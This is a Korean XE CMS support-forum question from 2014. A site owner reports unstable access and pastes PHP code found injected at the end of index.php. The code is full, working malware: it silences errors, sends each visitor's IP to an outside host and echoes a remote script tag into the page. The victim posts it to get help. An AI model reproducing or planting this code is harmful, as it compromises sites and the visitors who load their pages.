묻고답하기

  2. Support
  3. 묻고답하기

XE 해킹일까요?

2014.04.24 21:55

CEO송선생

index.php파일 최하단에

 


#af7fbf#
if (empty($sehbv)) {

    error_reporting(0);

    @ini_set('display_errors', 0);

    if (!function_exists('__url_get_contents')) {

        function __url_get_contents($remote_url, $timeout)

        {

            if (function_exists('curl_exec')) {

                $ch = curl_init();

                curl_setopt($ch, CURLOPT_URL, $remote_url);

                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

                curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);

                curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); //timeout in seconds

                $_url_get_contents_data = curl_exec($ch);

                curl_close($ch);

            } elseif (function_exists('file_get_contents') && ini_get('allow_url_fopen')) {

                $ctx = @stream_context_create(array('http' =>

                    array(

                        'timeout' => $timeout,

                    )

                ));

                $_url_get_contents_data = @file_get_contents($remote_url, false, $ctx);

            } elseif (function_exists('fopen') && function_exists('stream_get_contents')) {

                $handle = @fopen($remote_url, "r");

                $_url_get_contents_data = @stream_get_contents($handle);

            } else {

                $_url_get_contents_data = __file_get_url_contents($remote_url);

            }

            return $_url_get_contents_data;

        }

    }

    if (!function_exists('__file_get_url_contents')) {

        function __file_get_url_contents($remote_url)

        {

            if (preg_match('/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i',

                $remote_url, $matches)

            ) {

                $protocol = strtolower($matches[1]);

                $host = $matches[2];

                $path = $matches[3];

            } else {

                // Bad remote_url-format

                return FALSE;

            }

            if ($protocol == "http") {

                $socket = @fsockopen($host, 80, $errno, $errstr, $timeout);

            } else {

                // Bad protocol

                return FALSE;

            }

            if (!$socket) {

                // Error creating socket

                return FALSE;

            }

            $request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";

            $len_written = @fwrite($socket, $request);

            if ($len_written === FALSE || $len_written != strlen($request)) {

                // Error sending request

                return FALSE;

            }

            $response = "";

            while (!@feof($socket) &&

                ($buf = @fread($socket, 4096)) !== FALSE) {

                $response .= $buf;

            }

            if ($buf === FALSE) {

                // Error reading response

                return FALSE;

            }

            $end_of_header = strpos($response, "\r\n\r\n");

            return substr($response, $end_of_header + 4);

        }

    }

 

    if (empty($__var_to_echo) && empty($remote_domain)) {

        $_ip = $_SERVER['REMOTE_ADDR'];

        $sehbv = "http://www.processnet.com.ar/good_job/yWXjwvJc.php";

        $sehbv = __url_get_contents($sehbv."?a=$_ip", 1);

        if (strpos($sehbv, 'http://') === 0) {

            $__var_to_echo = '<script type="text/javascript" src="' . $sehbv . '?id=12328198"></script>';

            echo $__var_to_echo;

        }

    }

}
#/af7fbf#

 

 

 

사이트 접속이 되다 말다 그러고 페이지를 찾을 수 없습니다 빈도가 상당히 잦아 서버를 재부팅 해봤으나 증상은 동일하여 FTP를 열었더니..

 

위와같은 소스가 들어있었습니다.

업로드 한적이 없었음에도 불구하고 위의 소스가 들어가있고

업로드시간은 4월 24일 5시 40분 자로 표시되어있네요..

다시 원래 XE 의 기본 php 파일을 올렸으나 속도 문제는 해결 되지 않네요.

 

무섭습니다. 어떻게 해야할까요?

이 게시물을
Profile
좋아요
목록
글쓴이 제목 최종 글
XE 공지 글 쓰기,삭제 운영방식 변경 공지 [16] 2019.03.05 by 남기남
본체 로고아래쪽에 즐겨찾기 추가를 넣을려고 하는데요..  
oscarmike <div class="fr"> 가 의미하는게 무엇인가요? [6] 2014.04.25 by 브레인630
도메인8295 현재 XE 최신버전인 1.7.4.1 버전을 쓸때 가장 적합한 PHP버전은 뭔가요? [4] 2014.04.25 by 도메인8295
jikong defult 레이아웃 질문 드립니다. [5] 2014.04.24 by jikong
CEO송선생 XE 해킹일까요? [13] 2014.04.24 by KrteamENT
시골81 게시판 글 작성시 오류 (TypeError:'css' 속성값을 가져올 수 없습니다.) [1] 2014.04.24 by KrteamENT
콩까기 xe오류인거같은데...사이트 메뉴편집에 안뜨는 게시판 설정하는방법 [7] 2014.04.24 by KrteamENT
JerryKim 로그인시 포인트지급 버그? [1] 2014.04.24 by KrteamENT
JerryKim 댓글창 단순화 [5] 2014.04.24 by JerryKim
시골81 누구나 작성가능한 게시판 [5] 2014.04.24 by 銀童
coko 관리자 로그인이 안되요 [1] 2014.04.24 by KrteamENT
클림트 검색결과에서 엮인글탭 삭제 [2] 2014.04.24 by 클림트
와이군1 게시판설정에 분류관리와 사용자 정의를 저장해서 사용가능한가요? [4] 2014.04.24 by 와이군1
콩까기 통합검색 결과에서 태그부분을 따로 빼고싶습니다 [2] 2014.04.24 by 콩까기
putty 로그인 안하면 게시판이 안보여요 [2] 2014.04.24 by putty
비상교육 소셜로그인 토큰 발행처. [1] 2014.04.24 by sejin7940
슈니슈니 댓글쓰기창 닫혀있게 하려면 어디를 고쳐야하나요? [3] 2014.04.24 by 애니즌
루팡쿠팡 최신글, 최신댓글 위젯 캐쉬 설정하는 방법좀 알려주세요~ (스케치북) 아무리 찾아봐도 설정하는곳이 없네요 -.-; [13] 2014.04.24 by 애니즌
하람나라 로그인, 회원가입이 안 되고 게시글이 보이지 않습니다. [2] 2014.04.24 by 하람나라
잉카러부 지금 네이버 신디케이션 연동 다 날라감 [1] 2014.04.24 by 잉카러부
브레인630 사이트가 갑자기 빈페이지가 나올 때.... [9] 2014.04.24 by 애니즌
나만의너 db에서 쿼리를 사용해서 경로를 한번에 바꾸는 방법 좀 알려주세요 [2] 2014.04.24 by 나만의너
애니즌 한글,영문,특문 한글자씩 잘라서 줄바꿈 가능할까요? [4] 2014.04.24 by 애니즌
멍멍이호스팅 가입인증메일이 안옵니다. [5] 2014.04.24 by prologos
똑디 png 반투명 배경 처리 방법? [8] 2014.04.24 by 똑디
최윤한 스마트 레이아웃사용중인데요 서버이전후 로그인박스가 작아지고 "이메일" 문구 사라졌네요  
슈팅1106 스케치북 방명록에 관해서 물어보고싶은게 있어요~  
애니즌 엮인글 모듈을 그냥 삭제해도 문제가 없나요? [2] 2014.04.24 by 애니즌
손주사랑 스마트폰에서는 관리페이가 ᆞ [2] 2014.04.24 by 손주사랑
레망 content 위젯에서 ..... [2] 2014.04.24 by 레망
태그 쓰기